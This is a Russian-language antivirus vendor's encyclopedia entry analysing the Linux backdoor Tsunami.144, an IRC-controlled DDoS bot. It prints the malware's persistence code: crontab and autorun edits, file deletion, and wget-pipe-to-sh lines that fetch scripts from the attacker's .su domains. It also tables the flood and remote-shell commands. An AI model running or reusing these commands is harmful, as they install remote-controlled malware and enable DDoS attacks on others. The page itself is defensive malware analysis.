ПОЛЬЗОВАТЕЛЯМ

Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32 | Skype

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Linux.BackDoor.Tsunami.144

Добавлен в вирусную базу Dr.Web: 2015-07-16

Описание добавлено:

SHA1:

  • e8a8d48e1083e7146d5efcba1d6490f05cd8c897 (unpacked)
  • 577551c6a550c3fd30169fb4c2a62fa8b6e73686 (packed)

Бэкдоры для операционных систем семейства Linux, устанавливаемые троянцем Linux.PNScan.1. При запуске троянец подготавливает для себя автозагрузку:

system("echo \"nameserver 8.8.8.8\" > /etc/resolv.conf &");
system("rm -rf /var/run/wgs* > /dev/null 2>&1 &");
system("rm -rf /var/run/bbs* > /dev/null 2>&1 &");
system("rm -rf /var/run/tty* > /dev/null 2>&1 &");
system("ulimit -s unlimited > /dev/null 2>&1 &");
system("mount -t ext2 /dev/mtdblock4 /tmp/config > /dev/null 2>&1");
system("mount -t ext2 /dev/mtdblock5 /tmp/config > /dev/null 2>&1");
system("mount -t ext2 /dev/sdx6 /tmp/config > /dev/null 2>&1");
system("mount -t ext2 /dev/sdc6 /tmp/config > /dev/null 2>&1");
system("rm -rf /var/run/getty1 > /dev/null 2>&1 &");
system("rm -rf /var/run/getty2 > /dev/null 2>&1 &");
system("rm -rf /var/run/getty3 > /dev/null 2>&1 &");
system("cat /tmp/config/autorun.sh | grep -v \"nameserver 8.8.8.8\" | grep -v \"sleep 43200\" | grep -v \"erpcit\" | grep -v \"o.kei\" > /var/run/.backup");
system("echo \"echo \"nameserver 8.8.8.8\" > /etc/resolv.conf\"  >> /var/run/.backup");
system("echo \"sleep 120 && wget -qO - http://*.***.su/qn | sh > /dev/null 2>&1 &\" >> /var/run/.backup");
system("cat /var/run/.backup > /tmp/config/autorun.sh");
system("chmod +x /tmp/config/autorun.sh");
system("umount /tmp/config");
system("rm -rf /var/run/.backup");
system("cat /etc/config/crontab | grep -v \"gettychk\" > /tmp/.fuckw");
system("echo \"* * * * * /var/run/gettychk > /dev/null 2>&1\" >> /var/run/.fuckw");
system("cat /tmp/.fuckw > /etc/config/crontab");
system("crontab -l | grep -v \"gettychk\" > /var/run/.fuckx");
system("echo \"* * * * * /var/run/gettychk > /dev/null 2>&1\" >> /var/run/.fuckx");
system("echo \"#!/bin/sh\" > /var/run/gettychk");
system("echo \"pidof getty0 || ( rm -rf /var/run/getty.pid && /var/run/getty0 ) \" >> /var/run/gettychk");
system("chmod 700 /var/run/gettychk");
system("crontab /var/run/.fuckx");
system("crontab /etc/config/crontab");
system("rm -rf /var/run/.fuckw");
system("rm -rf /var/run/.fuckx");
system("/etc/init.d/crond.sh restart > /dev/null 2>&1 &");
system("wget -qO - http://*.***.su/botkill | sh > /dev/null 2>&1 &");

Для соединения с управляющим IRC-сервером формирует строку имени и псевдонима следующим образом:

x32|Linux|root|%c%c%c%c%c%c%c%c%c

где %c – случайный символ из набора цифр ("0123456789"). Если у бэкдора нет привилегий суперпользователя, вместо root используется значение "unk".

При подключении к IRC-серверу вредоносная программа ожидает поступления входящих команд. Бэкдор способен выполнять следующий базовый набор команд:

КомандаДействиеКомментарий
352Установить поддельный IP
433Сгенерировать новый ник
ERRORСгенерировать новый ник
NICKПоменять ник на строку из команды
PINGОтправить PONG
376Зайти на каналSend(fd, "NICK %s\n", nick);
Send(fd, "MODE %s -xi\n", nick);
Send(fd, "JOIN %s :%s\n", chan, pass);
422Зайти на каналSend(fd, "NICK %s\n", nick);
Send(fd, "MODE %s -xi\n", nick);
Send(fd, "JOIN %s :%s\n", chan, pass);
PRIVMSGВыполнить специальную команду

Помимо этого, троянец способен выполнять следующий набор расширенных команд:

КомандаДействиеСинтаксис
RANDOMFLOODСлучайным образом переключиться между режимами ACK и SYN FloodRANDOMFLOOD <target> <port> <secs>
ACKFLOODACK Flood (spoofed)ACKFLOOD <target> <port> <secs>
SYNFLOODSYN Flood (spoofed)SYNFLOOD <target> <port> <secs>
TSUNAMIНачать DDoS-атакуTSUNAMI <target> <secs>
PAN«Улучшенный» SYN FloodPAN <target> <port> <secs>
SUDPUDP Flood (spoofed)SUDP <target> <port> <secs>
UDPUDP FloodUDP <target> <port> <secs>
NSACKFLOODACK FloodNSACKFLOOD <target> <port> <secs>
NSSYNFLOODSYN FloodNSSYNFLOOD <target> <port> <secs>
STDНачать DDoS-атакуSTD <target> <port> <secs>
UNKNOWNНачать DDoS-атакуUNKNOWN <target> <secs> (recommended for non-root users)
KILLALLПрекратить DDoS-атаку
DNSОпределить домен и сообщить серверу его IP
CUSTOMВыполнить произвольный скрипт (по предустановленной ссылке)
wget -qO - http://o.kei.su/custom | sh > /dev/null 2>&1
PATCHПрименить патч от уязвимости shellshock
wget -qO - http://o.kei.su/patch | sh > /dev/null 2>&1
BOTKILLУдалить другие троянские программы
wget -qO - http://o.kei.su/botkill | sh > /dev/null 2>&1
GETSPOOFSПолучить параметры спуфинга
SPOOFSУстановить IP или диапазон IP для спуфингаSPOOFS <iprange/ip>
VERSIONВозвратить версию бэкдора
SERVERСменить сервер на указанный в команде
GETВыполнить загрузку указанного файлаGET <url> <save as>
IRCПослать указанные команды IRC на серверIRC <arg1> <arg2> <arg...>
HELPПоказать список доступных команд
SHВыполнить набор sh-командSH <arg1> <arg2> <arg...>

Рекомендации по лечению


Linux

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Демо бесплатно

На 1 месяц (без регистрации) или 3 месяца (с регистрацией и скидкой на продление)

Скачать Dr.Web

По серийному номеру

Российский разработчик антивирусов Dr.Web с 1992 года
Dr.Web в Реестре Отечественного ПО
Dr.Web совместим с российскими ОС и оборудованием
Dr.Web пользуются в 200+ странах мира
Техническая поддержка 24х7х365 Рус | En

Dr.Web © «Доктор Веб»
2003 — 2021

«Доктор Веб» — российский производитель антивирусных средств защиты информации под маркой Dr.Web. Продукты Dr.Web разрабатываются с 1992 года.

125124, Россия, Москва, 3-я улица Ямского поля, д.2, корп.12А